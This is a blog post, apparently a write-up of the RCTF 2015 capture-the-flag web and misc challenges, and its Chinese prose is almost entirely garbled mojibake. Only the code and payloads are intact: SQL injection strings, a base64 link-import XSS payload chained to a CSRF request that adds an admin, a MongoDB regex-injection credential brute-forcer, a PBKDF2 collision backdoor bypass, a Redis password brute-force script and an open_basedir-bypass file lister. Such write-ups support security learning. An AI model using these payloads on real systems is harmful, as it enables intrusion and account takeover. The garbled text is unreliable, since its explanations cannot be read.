LoRexxar's Blog

RCTF2015_writeup

2015/11/17

杩欐鐨剅ctf璨屼技鏄涓娆′妇鍔烇紝鑰屼笖杩樻槸鎵灞瀤ctf锛屾墍浠ュ嚭鐜颁簡濂藉澶х墰闃熶紞锛岄鐩剳娲炲ぇ杩樿寮鸿澧炲姞闅惧害锛堜及璁″嚭棰樹汉宸茬粡鎶婅兘鎯冲埌鐨勯棶棰樺叏閮ㄦ墧涓婂幓浜嗭級锛屼篃涓嶇煡閬撴槸鍙椾簡浠涔堢殑鍒烘縺锛屼笉绠℃庝箞鏍凤紝杩樻槸浠庝竴澶у爢娉ㄥ叆棰樼洰涓涔犱簡涓嶅皯娌¤杩囩殑娉ㄥ叆濮垮娍锛岀暀涓媤riteup鈥

WEB

WEB 100 upload (鏂囦欢鍚 insert injection锛

鎵撳紑椤甸潰鏄繖鏍风殑锛岀◢寰瘯璇曪紝鍙戠幇骞朵笉鏄痷pload锛屼笂浼犳垚鍔熶箣鍚庝細鍙戠幇浼氭樉绀轰笂浼犵殑鏂囦欢鍚嶏紝鎵浠ユ兂鍒板簲璇ユ槸insert injection,杩囨护浜哸nd, select, union, from, sleep, benchmark, substring杩欐牱鐨勶紝浣嗘槸鍙互閫氳繃scrscriptipt杩欐牱鐨勬柟寮忕粫杩囥
寮濮嬪皾璇曠殑寰堝鏂瑰紡閮芥病鏈夊洖鏄撅紝鎵浠ユ斁寮冧簡锛屽悗鏉ョ湅鍒皐riteup鎵嶆槑鐧斤紝琛ㄤ腑鐨勭粨鏋勫ぇ姒傛槸
鈥樻枃浠跺悕鈥,鈥檜id鈥,鈥檜id鈥
鑰寀id杩斿洖鐨勯兘鏄暟瀛楋紝鎵浠ュ鏋滄病鏈夊湪瀵瑰簲鐨勪綅缃殑璇濈殑纭笉浼氬嚭鐜板洖鏄撅紝褰撶劧濡傛灉寮鸿杩斿洖鏁板瓧锛屼篃鏄彲浠ワ紝浣嗘槸鏈変釜楠岃瘉鐮佸瓨鍦紝鎵浠ラ渶瑕佸緢闀垮緢闀挎椂闂存墠鑳藉緱鍒癴lag锛屼笉杩囧緱鍒版纭殑琛ㄧ粨鏋勫氨寰堢畝鍗曚簡銆

1
鏂囦欢鍚','uid','uid'),((database()),'uid','uid')

鎸夌収杩欐牱鐨勬柟寮忎笅鍘伙紝鎱㈡參灏辫兘get flag

WEB 150 weeeeeb3 (淇敼瀵嗙爜閫昏緫婕忔礊 ip浼 涓婁紶缁曡繃锛


棰樼洰鏄繖鏍风殑锛岀◢寰炕缈诲彂鐜板湪淇敼瀵嗙爜鐨勫湴鏂瑰瓨鍦ㄤ袱閮紝绗竴姝ュ垽鏂垚鍔熷悗杩涘叆绗簩姝ヤ慨鏀瑰瘑鐮

鍦ㄨ繖閲屽彲浠ユ姄鍖呭苟淇敼admin鐨勫瘑鐮侊紝寮濮嬭繕浠ヤ负鏃犳晥锛屽悗鏉ュ彂鐜版槸鐧婚檰鐨勪汉澶浜嗭紝鎵浠ュ繀椤昏窇鑴氭湰鎵嶈兘鎴愬姛銆

鐧婚檰涓婂幓鍚庯紝鐐筸essage鎻愮ずip涓嶅锛屼簬鏄幓淇敼xff锛圶-Forward-For)鍜宑i(Cilet ip锛夛紝鐧婚檰鍚庢彁绀
<!鈥 index.php?module=filemanage&do=???鈥>
杩欓噷涓閫氫贡璇曞彂鐜皍pload鎴愬姛浜嗭紝鍑虹幇浜嗕竴涓笂浼犻〉闈紝杩欓噷灞呯劧杩樻病鏈夌粨鏉燂紝濂界儲鍙兘缁х画鈥
闅忎究涓婁紶璇曡瘯锛屽彂鐜颁粈涔堥兘娌℃湁鎻愮ず You know what I want!
鏃㈢劧杩欐牱灏辨槸鏄痯hp 鎻愮ずSomething shows it is a php!
鍚庢潵璇曚簡璇曟庝箞閮借繃涓嶄簡<?鎵浠ユ斁寮冧簡锛岀湅writeup瀛﹀埌涓粦绉戞妧

锛堣繖tm閮藉彲浠ャ傘傘傦級get flag

WEB 150 easysql (鏄鹃敊娉ㄥ叆 鑺卞紡bypass锛

棰樼洰鐧婚檰鍚庢槸杩欐牱鐨

鍙戠幇娉ㄥ唽鏃跺欏姞鍏モ滃悗锛屼慨鏀瑰瘑鐮佹姤閿

涓涓嬪瓙浜嗙劧浜嗭紝鏄樉閿欐敞鍏ワ紝杩囨护rand @ ` 绌烘牸 order /*/ /! */ %20 %09 %0a %0b %0c %0d
涔熷氨鏄紶缁熺殑鏄鹃敊鏂瑰紡涓嶅彲浠ワ紝杩樿繃婊や簡鍚勫紡鍚勬牱鐨勭┖鏍硷紝鎵浠imit涔熶笉鑳戒娇鐢紝杩欓噷鍏堢粰鍑簆ayload锛屽悗闈㈠啀鍙﹀啓鏂囩珷鍏充簬鏄鹃敊娉ㄥ叆銆

1
username=ddog"||updatexml(0x7c,concat((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^R'))),1)#&password=123&email=123

杩囨护浜嗙倰楦″鏍囩锛岃繖娆¤繕杩囨护浜嗗ぇ灏忓啓鍜寀rl缂栫爜锛屾墍浠ュ氨瑕佹壘鍐欐病鏈夎杩囨护鐨勭壒娈婃爣绛句簡锛屽紑濮嬫兂鍒扮殑鏄痵vg锛屼絾鏄痓asa64缂栫爜杩囩殑鎬绘槸鍑虹幇on琚繃婊わ紝鑰屼笖鍙瓨鍦ㄥ湪firefox锛岃岄鐩姹俢hrome鎵浠ユ湁鐐瑰効闆穿锛屽悗鏉ョ湅浜唚riteup锛岀煡閬撲簡link杩欎釜榛戠鎶銆

1
<link rel="import" href="data:text/html;base64,PHNjcmlwdD5kZWxldGUgYWxlcnQ7YWxlcnQoIkhlbGxvIik7PC9zY3JpcHQ+">

杩欐牱灏卞彲浠ュ脊绐椾簡锛岀炕缈绘簮鐮侊紝鍙戠幇鏄鎶婃秷鎭彂缁檃dmin锛岀劧鍚庝互amdin璐﹀彿娉ㄥ唽璐﹀彿锛屽吀鍨嬬殑csrf銆

1
2
3
4
5
6
7
8
9
<!--only for admin
<form action="" method="post">
username:<input type="text" name="name"><br />
password:<input type="password" name="pass"><br />
<input type="radio" name="isadmin" value="0">user
<input type="radio" name="isadmin" value="1">admin<br />
<input type="hidden" name="token" value="34a1615ff3eaf616f7fa205a12792d27">
<input type="submit" name="adduser" value="adduser">
</form>-->

鍦╳riteup涓槸鐩存帴閫氳繃jq鍐欎釜post璇锋眰娣诲姞

1
2
3
4
5
6
7
<script src=http://180.76.178.54:8004/4b79f5d4860384d4ac494ad91f5313b7/js/jquery.js></script>
<script>
$.ajax({
type: "post",
url: "",
data: "name=tomato123&pass=tomato123&isadmin=1&adduser=adduser&token="+$("input[name=token]").val()})
</script>

鐒跺悗鏋勯爌ayload

1
<link rel="import" href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzE4MC43Ni4xNzguNTQ6ODAwNC80Yjc5ZjVkNDg2MDM4NGQ0YWM0OTRhZDkxZjUzMTNiNy9qcy9qcXVlcnkuanM+PC9zY3JpcHQ+CjxzY3JpcHQ+CiQuYWpheCh7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0eXBlOiAicG9zdCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1cmw6ICIiLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGF0YTogIm5hbWU9dG9tYXRvMTIzJnBhc3M9dG9tYXRvMTIzJmlzYWRtaW49MSZhZGR1c2VyPWFkZHVzZXImdG9rZW49IiskKCJpbnB1dFtuYW1lPXRva2VuXSIpLnZhbCgpfSkKPC9zY3JpcHQ+">

鎵惧埌admin.php锛岀劧鍚庣櫥闄嗗緱鍒癴lag

WEB 300 login (mongodb娉ㄥ叆鍔犱笉鎷変笉鎷変竴鍫嗗潙锛


杩欓噷鐩存帴鍗″湪绗竴姝ワ紝铏界劧鍚繃杩欐牱鐨勬敞鍏ワ紝浣嗘槸杩樻槸娌$爺绌惰繃锛屽厛璐翠笂鍏充簬mongodb娉ㄥ叆鐨勮祫鏂
http://drops.wooyun.org/tips/3939
璺戝嚭璐﹀彿鐨勮剼鏈暱杩欐牱锛堢湅涓嶆噦锛屽厛鐣欑潃锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
ini_set("max_execution_time", 100);
echo 'start<br />';
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,'http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/checkLogin.php');
curl_setopt ($ch, CURLOPT_HTTPHEADER , array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);
$ori = '0123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPASDFGHJKLZXCVBNM_';
$str = '';
for ($i=0; $i <40 ; $i++) {
if($i > (strlen($str)+1) )
break;
for ($j=0; $j <strlen($ori) ; $j++) {
$post = 'username[$regex]=/^'.$str.$ori[$j].'.*/&password[$ne]=admin';
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$data=curl_exec($ch);
if (strlen($data) == 104) {
$str.=$ori[$j];
break;
}
}
}
$username = $str;
$str = '';
for ($i=0; $i <40 ; $i++) {
if($i > (strlen($str)+1) )
break;
for ($j=0; $j <strlen($ori) ; $j++) {
$post = 'username='.$username.'&password[$regex]=/^'.$str.$ori[$j].'.*/';
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$data=curl_exec($ch);
if (strlen($data) == 104) {
$str.=$ori[$j];
break;
}
}
}
$password = $str;
echo 'username='.$username."<br />";
echo 'password='.$password."<br />";
echo 'end!';
?>

寰楀埌璐﹀彿瀵嗙爜ROIS_ADMIN pas5woRd_i5_45e2884c4e5b9df49c747e1d
鐧婚檰鍚庢槸杩欐牱鐨

涓嬭浇澶囦唤鏂囦欢锛屽彂鐜版槸涓涓猵hp鐨勮В鍘媧ip鐨勭被锛岀劧鍚庣櫨搴︽壘鍒板畼鏂规彁渚涚殑锛屽湪diff涓涓
婧愮爜閲屽彂鐜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$Agent = $_SERVER['HTTP_USER_AGENT'];
$backDoor = $_COOKIE['backdoor'];
$msg = json_encode("no privilege");
$iterations = 1000;
$salt = "roisctf";
$alg = "sha1";
$keylen = "20";
if ($Agent == $backDoor || strlen($Agent) != 65) {
exit($msg);
}
if (substr($Agent,0,23) != "rois_special_user_agent") {
exit($msg);
}
if (pbkdf2($alg, $Agent, $salt, $iterations, $keylen) != pbkdf2($alg, $backDoor, $salt, $iterations, $keylen)) {
exit($msg);
}

娴嬭瘯鍙戠幇鐩存帴涓婁紶zip鎻愮ず娌℃湁鏉冮檺锛岀劧鍚庡彧鏈夎繃浜嗕笂闈笁涓潯浠舵墠琛屻備富瑕佹槸绗笁涓潯浠朵笉濂借繃锛岀劧鍚巊oogle涓鍙 pdkdf2 ctf

鎵惧埌浜嗚繖涓 PBKDF2+HMAC collision 鐒跺悗鍦https://mathiasbynens.be/notes/pbkdf2-hmac
杩欑瘒鏂囩珷閲岄潰璇村埌杩欎釜鏄彲浠ョ鎾炵殑锛屽氨鏄笉鍚岀殑鏄庢枃浼氬嚭鐜扮浉鍚岀殑瀵嗘枃锛岀劧鍚庣敤閲岄潰鎻愪緵鐨勮剼鏈窇涓鍙戙傛垚鍔熻窇鍑烘潵涓涓

1
2
rois_special_user_agentaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaamipvkd
3-Rfm^Bq;ZZAcl]mS&eE

鐒跺悗鏀逛竴涓媢a锛屽湪cookie閲岄潰娣诲姞backdoor灏卞彲浠ユ垚鍔熶笂浼犱簡

鎸夌収瑙e帇鍑烘潵鐨勬枃浠剁殑鍛藉悕瑙勫垯涓簃d5(鏂囦欢鍚嶏紜RoisFighting).鏂囦欢鐨勫悗缂 浣嗘槸璁块棶http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/upload/image/051ee28a1964f9f2779d32f2e48212cb/70d08f9380da3a6e0440b3266a2a39f6.php 鏂囦欢骞朵笉瀛樺湪锛屾祴璇曞彂鐜板湪瑙e帇鍚庝細鐩存帴鍒犻櫎鏂囦欢锛屾墍浠ユ垜浠彲浠ュ皾璇曟瀯閫犱竴涓В鍘嬪埌涓婄骇鐩綍鐨剆hell

shell鍦板潃灏辨槸 http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/upload/image/382aef24b11f8c5222bc58062a9bf5c7.php

鍚庨潰鐨勫弽姝f槸鐪嬩笉鎳傦紝灏遍兘鎵斾笂鍘讳簡

WEB 500 绯婁笂鏉ュ畼鏂圭殑writeup

1.閫氳繃鐩綍鐚滆В1.sql鏁版嵁澶囦唤鏂囦欢鍙互鐭ラ亾锛宎dmin鐢ㄦ埛鐨勫瘑鐮佸氨鏄痑dmin锛寀sername瀛楁闀垮害16锛宲assword瀛楁闀垮害32銆 閫氳繃娴嬭瘯锛屽彲浠ュ埄鐢ㄩ暱瀛楃鎴柇admin 1锛堥暱搴﹀ぇ浜16锛夛紝admin 1锛堥暱搴﹀ぇ浜32锛夛紝缁曡繃admin涓嶈兘鐧诲綍鐨勯檺鍒躲

2.鐧诲綍鍚庡彴锛屾槸admin鐨勪俊鎭紝鏌ョ湅婧愮爜锛屾牴鎹彁绀猴紝鍗抽氳繃绀惧伐銆傚嵆瑕佺牬瑙f煇涓湇鍔$殑瀵嗙爜銆俷map鎵弿锛屽緱鍒皉edis鏈嶅姟鐨勭鍙c傚嵆瑕佺垎鐮磖edis鐨勫瘑鐮併

3.鍐欒剼鏈紝鐖嗙牬redis瀵嗙爜锛岀敱涓婇潰admin鐨勪俊鎭唴瀹癸紝閫氳繃鏌ユ壘绀惧伐搴撳緱鍒癵mail鐨勫瘑鐮佹槸rkr4me锛屼絾杩欎笉鏄粬鐪熸鐨勫瘑鐮併傜粨鍚堝叾浠栦俊鎭紝鏍规嵁鍏抽敭瀛楀啓涓剼鏈敓鎴愬瓧鍏搞
鐢熸垚瀛楀吀鑴氭湰

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
import itertools
fp = open('social.txt','w')
keyword = ['JiaoXiaoMing', 'jiaoxiaoming', 'jxm', 'Jxm', 'JXM', '19960708', '960708', '0708', 'rkr4me']
for i in range(1,9):
for e in itertools.permutations(keyword, i):
st = ''.join(e)
fp.write(st+'\n')
fp.close()

鐖嗙牬瀵嗙爜鑴氭湰

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env python
import redis
fo = open('social.txt', 'r')
for line in fo.readlines():
line = line.strip('\n').strip()
r = redis.Redis(host='180.76.178.50', port=6379, db=0, password=line)
try:
r.info()
except Exception,e:
#print e
continue
else:
print line
break

鏈鍚庣垎鐮村嚭鏉ョ殑瀵嗙爜鏄疛xm0960708rkr4me

4.杩炰笂redis锛宺edis getshell闇瑕佺綉绔欒矾寰勩傚垯鎯冲姙娉曡幏鍙栫綉绔欒矾寰勶紝缃戠珯璺緞鎶ラ敊娌℃湁鍥炴樉锛岄偅灏辫棰濆鐨勬柟娉曚簡銆傜綉绔欎篃娌℃湁phpinfo鏂囦欢锛岀劧鍚庨氳繃login.php~澶囦唤鏂囦欢鑾峰彇鍒颁簡internal.php杩欎釜璺緞锛屼絾鏄棤娉曡闂紝鏍规嵁鍐呴儴娴嬭瘯绯荤粺锛屽彲鑳芥槸闄愬埗ip銆傞偅閫氳繃浼燙lient-ip: 127.0.0.1杩涘叆浜唅nternal.php椤甸潰锛屾湁涓祴璇曟帴鍙c

鑷劧鎯冲埌浜哻srf锛宑srf杩囨护浜嗕竴浜涘唴瀹癸紝涓嶆柇璋冭瘯锛屾瀯閫爌ayload锛屽緱鍒http://a@127.0.0.1.xip.io:80姝ょ被鐨勬瀯閫狅紝涔熷氨鏄鏈墄xx@锛寈ip.io:绔彛锛岃繖鏍锋墠鑳界粫杩囪繃婊(鍓嶉潰鏈変簺bug锛岃鍚勮矾澶х墰鏇磋交鏄撶粫杩)銆傜劧鍚庨氳繃csrf鎵弿绔彛鍜岃矾寰勶紝寰楀埌8080绔彛锛宲ayload鏄繖鏍风殑http://abc@127.0.0.1.xip.io:8080/index.php
寰楀埌閲岄潰鐨勯儴缃叉彁绀猴紝瀹為檯缃戠珯閮ㄧ讲鍦╤e1m4n6a鐩綍涓嬶紝鏍规嵁8080棣栭〉鍗硃hpinfo鍐呭锛屽緱鍒扮綉绔欑湡瀹炶矾寰/var/www/rois/he1m4n6a

5.Redis 璁剧疆濂借矾寰勶紝getshell鍚庯紝鍙戠幇鏃犳硶璁块棶鏍圭洰褰曘傚簲璇ユ槸openbase_dir璁剧疆鐨勶紝閭e氨涓婁紶涓涓枃浠剁粫杩噊penbase_dirphp鏂囦欢,鍒楀嚭鏇寸洰褰曟墍鏈夋枃浠讹紝寰楀埌鏍圭洰褰曠殑涓涓枃浠跺悕rctf{xxx},渚挎槸flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php $file_list = array();
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f) {
echo file_get_contents({$f});
echo "{$f}<br/>";
}
?>

6.鏈嶅姟鍣ㄥ悗鍙拌嚜鍔ㄨ繍琛岃剼鏈紝姣忛殧涓娈垫椂闂翠細鍒犻櫎鏃犲叧鏂囦欢锛屾墍浠ヤ綘寰楀啓鑴氭湰涓嶆柇涓婁紶webshell锛屾垨鑰厀ebshell鍐欏叆鍐呭瓨涓紝鎴栬呮墜閫熷揩鐨勫氨濂戒簡銆傘

MISC

MISC 10

360鍑鸿繃鐨勮姳閿洏锛屾病浠涔堟剰鎬濓紝杩樺嚭浜嗗嚑涓亣flag锛屽疄璇濊杩欑鎵嬫鐗瑰埆鏃犺亰锛岃繕褰卞搷浜

MISC 50 鏃ュ織鍒嗘瀽

铔湁鎰忔濈殑棰樼洰锛屽紑濮嬪凡缁忓湪鎯虫槸涓嶆槸瑕佷笢瑗匡紝鍚庢潵鍙戠幇鍏跺疄鏄痵qlmap璺戝瘑鐮佺殑鏃ュ織锛屾牴鎹棩蹇楀彲浠ュ垎鏋愬嚭flag
http://pan.baidu.com/s/1i3vuGUL(pipo)
闄勪笂鑴氭湰

1
2
3
4
5
6
7
8
9
10
11
12
13
import urllib
log = open('log_flag.log','r')
log2 = open('log_flag_urldecode2.log','w')
for eachLine in log:
pos = eachLine.find('id=')
result = urllib.unquote(eachLine[pos+3:])
if result.find('!=') != -1:
log2.write(result[result.find('!=')+2:result.find('),S')] + ',')
log.close()
log2.close()

MISC 100 (鑺卞紡鑴戞礊瀵嗘枃锛

http://pan.baidu.com/s/1jG95P90(8flk)

娌¤閿欑殑璇濇墦寮鏄紶鍥剧墖锛屽紑濮嬩互涓烘槸鏈夐殣鍐欙紝鍚庢潵鍦ㄧ綉涓婃壘鍒颁簡鍘熷浘锛屽姣斿彂鐜版瘺鍖哄埆閮芥病鏈夛紝鍙湁鍦‥XIF淇℃伅涓壘鍒
GMYDGMJTGEZTCMZQGMYDGMJTGEZTAMZRGMYTGMJTGEZTCMZRGMYTGMBTGAZTAMZRGMYDGMJTGEZTCMZRGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYTGMBTGEZTCMZRGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMBTGAZTAMZRGMYTGMBTGEZTCMZRGMYDGMJTGEZTCMZQGMYTGMJTGAZTAMZRGMYDGMJTGEZTCMZQGMYTGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTCMZRGMYDGMJTGAZTCMZQGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYDGMBTGAZTCMZRGMYTGMBTGEZTCMZQGMYTGMBTGAZTCMZQGMYDGMBTGEZTAMZRGMYTGMBTGEZTAMZRGMYTGMJTGAZTCMZQGMYDGMJTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTAMZQGMYTGMJTGEZTAMZRGMYDGMJTGEZTAMZRGMYDGMJTGAZTCMZRGMYDGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTAMZRGMYTGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTCMZRGMYDGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZRGMYDGMBTGAZTCMZRGMYTGMJTGAZTCMZQGMYTGMBTGEZTCMZQGMYDGMJTGAZTCMZQGMYDGMBTGAZTCMZQGMYDGMJTGEZTAMZR

寮濮嬩竴鐩翠互涓烘槸payfair鍏ㄥぇ鍐欏瓧姣嶅姞瀵嗭紝鍚庢潵鍙戠幇鍏跺疄鏄痓ase32锛屾帴鍑烘潵鏄竴瀵3130.鍐嶈В涓娆ex锛屽緱鍒01瀛楃涓
0111001101111111000101111100100101110111111011001010001101110111011001011101010010010111100011101010100100101100011101101001000101101011101001010111011001011110001001110101101010110010010010111011100111110010010100011101100101110111011011100100101001000111101010110010100001001101
鍙儨280浣嶏紝娌″姙娉曞紑鏂癸紝鎵浠ュ簲璇ヤ笉鏄簩缁寸爜锛屾兂鍒7浣嶄竴缁勶紝浣嗘槸鍥犱负瀛楃闆嗕笉鍙畾锛屾墍浠ユ渶鍚庢病瑙e嚭鏉ワ紝鏈鍚庣瓑绛墂riteup鍚

MISC 200

鍒拌繖涓姝ョ殑misc棰樼洰杩樹笉鐭ラ亾鏄共鍢涚殑锛屾墍浠ュ厛鏀炬斁
http://pan.baidu.com/s/1mgzsu5E(yi4v)

MISC 300

http://pan.baidu.com/s/1bncAdw7(yv6o)

CATALOG
  1. 1. WEB
    1. 1.1. WEB 100 upload (鏂囦欢鍚 insert injection锛
    2. 1.2. WEB 150 weeeeeb3 (淇敼瀵嗙爜閫昏緫婕忔礊 ip浼 涓婁紶缁曡繃锛
    3. 1.3. WEB 150 easysql (鏄鹃敊娉ㄥ叆 鑺卞紡bypass锛
    4. 1.4. WEB 300 xss (link 鏍囩榛戠鎶锛
    5. 1.5. WEB 300 login (mongodb娉ㄥ叆鍔犱笉鎷変笉鎷変竴鍫嗗潙锛
    6. 1.6. WEB 500 绯婁笂鏉ュ畼鏂圭殑writeup
  2. 2. MISC
    1. 2.1. MISC 10
    2. 2.2. MISC 50 鏃ュ織鍒嗘瀽
    3. 2.3. MISC 100 (鑺卞紡鑴戞礊瀵嗘枃锛
    4. 2.4. MISC 200
    5. 2.5. MISC 300